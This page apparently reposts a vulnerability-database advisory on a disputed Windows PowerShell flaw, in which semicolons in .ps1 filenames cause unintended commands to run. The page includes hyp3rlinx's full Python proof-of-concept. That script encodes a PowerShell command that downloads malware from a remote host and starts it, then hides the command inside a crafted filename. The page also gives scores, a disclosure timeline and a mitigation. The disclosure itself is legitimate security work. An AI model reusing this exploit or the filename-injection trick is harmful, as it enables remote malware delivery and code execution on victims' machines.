Microsoft Windows PowerShell privilege escalation [Disputed] – Digitalmunition




Exploit/Advisories Cybersecurity study of the dark web exposes vulnerability to machine identities -- ScienceDaily

Published on August 30th, 2019 📆 | 3763 Views ⚑

0

Microsoft Windows PowerShell privilege escalation [Disputed]

CVSS Meta Temp ScoreCurrent Exploit Price (≈)
4.9$0-$5k

A vulnerability classified as critical was found in Microsoft Windows (Operating System) (the affected version is unknown). This vulnerability affects some unknown functionality of the component PowerShell. The manipulation with an unknown input leads to a privilege escalation vulnerability. The CWE definition for the vulnerability is CWE-269. As an impact it is known to affect confidentiality, integrity, and availability.

The weakness was shared 08/01/2019 by John Page (hyp3rlinx) as unconfirmed security advisory (Website). The advisory is available at hyp3rlinx.altervista.org. The vendor cooperated in the coordination of the public release. Local access is required to approach this attack. A single authentication is needed for exploitation. Technical details are unknown but a public exploit is available. The advisory points out:

PowerShell can potentially execute arbitrary code when running specially named scripts due to trusting unsanitized filenames. This occurs when “.ps1” files contain semicolons “;” or spaces as part of the filename, causing the execution of a different trojan file; or the running of unexpected commands straight from the filename itself without the need for a second file.

A public exploit has been developed by John Page (hyp3rlinx) in POC and been published immediately after the advisory. It is declared as proof-of-concept. It is possible to download the exploit at hyp3rlinx.altervista.org. The vulnerability was handled as a non-public zero-day exploit for at least 12 days. During that time the estimated underground price was around $5k-$25k. The real existence of this vulnerability is still doubted at the moment. The code used by the exploit is:

from base64 import b64encode
import argparse,sys
#Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC
#Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename.
#Expects hostname/ip-addr of web-server housing the exploit.
#By hyp3rlinx
#Apparition Security
#====================


def parse_args():
    parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.")
    parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.")
    parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.")
    return parser.parse_args()

def main(args):
    PSEmbedFilenameMalwr=""
    if args.ipaddress:
        PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name
    return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE'))

def create_file(payload):
    f=open("Test;PowerShell -e "+payload+";2.ps1", "w")
    f.write("Write-Output 'Have a nice day!'")
    f.close()

if __name__=="__main__":
    
    parser = argparse.ArgumentParser()
    PSCmds = main(parse_args())

    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        sys.exit(1)
        
    create_file(PSCmds)
    print "PowerShell - Unsantized Filename Command Execution File created!"
    print "By hyp3rlinx"

The advisory illustrates:

or trojan files it doesn’t need to be another PowerShell script and can be one of the following “.com, .exe, .bat, .cpl, .js, .vbs and .wsf. Therefore, the vulnerably named file “.Hello;World.ps1” will instead execute “hello.exe”, if that script is invoked using the standard Windows shell “cmd.exe” and “hello.exe” resides in the same directory as the vulnerably named script.

The best possible mitigation is suggested to be disabling the affected component.

Type

Vendor

Name

VulDB Meta Base Score: 5.3
VulDB Meta Temp Score: 4.9

VulDB Base Score: 5.3
VulDB Temp Score: 4.9
VulDB Vector: 🔒
VulDB Reliability: 🔍

AVACAuCIA
🔍🔍🔍🔍🔍🔍
🔍🔍🔍🔍🔍🔍
🔍🔍🔍🔍🔍🔍
VectorComplexityAuthenticationConfidentialityIntegrityAvailability
unlockunlockunlockunlockunlockunlock
unlockunlockunlockunlockunlockunlock
unlockunlockunlockunlockunlockunlock


VulDB Base Score: 🔒
VulDB Temp Score: 🔒
VulDB Reliability: 🔍
Class: Privilege escalation (CWE-269)
Local: Yes
Remote: No

Availability: 🔒
Access: Public
Status: Proof-of-Concept
Author: John Page (hyp3rlinx)
Programming Language: 🔒
Download: 🔒

Price Prediction: 🔍
Current Price Estimation: 🔒

Threat Intelligenceinfoedit

Threat: 🔍
Adversaries: 🔍
Geopolitics: 🔍
Economy: 🔍
Predictions: 🔍
Remediation: 🔍Recommended: Disable
Status: 🔍

0-Day Time: 🔒
Exploit Delay Time: 🔍

07/20/2019 Vendor informed
07/23/2019 +3 days Vendor acknowledged
08/01/2019 +9 days Advisory disclosed
08/01/2019 +0 days Exploit disclosed
08/30/2019 +29 days VulDB entry created
08/30/2019 +0 days VulDB last updateVendor: microsoft.com
Product: microsoft.com

Advisory: hyp3rlinx.altervista.org
Researcher: John Page (hyp3rlinx)
Status: Unconfirmed
Coordinated: 🔒
Disputed: 🔍

Created: 08/30/2019 08:06 AM
Complete: 🔍
Submitter: hyp3rlinx

Use the official API to access entries easily!

https://vuldb.com/?id.141094

Tagged with:



Leave a Reply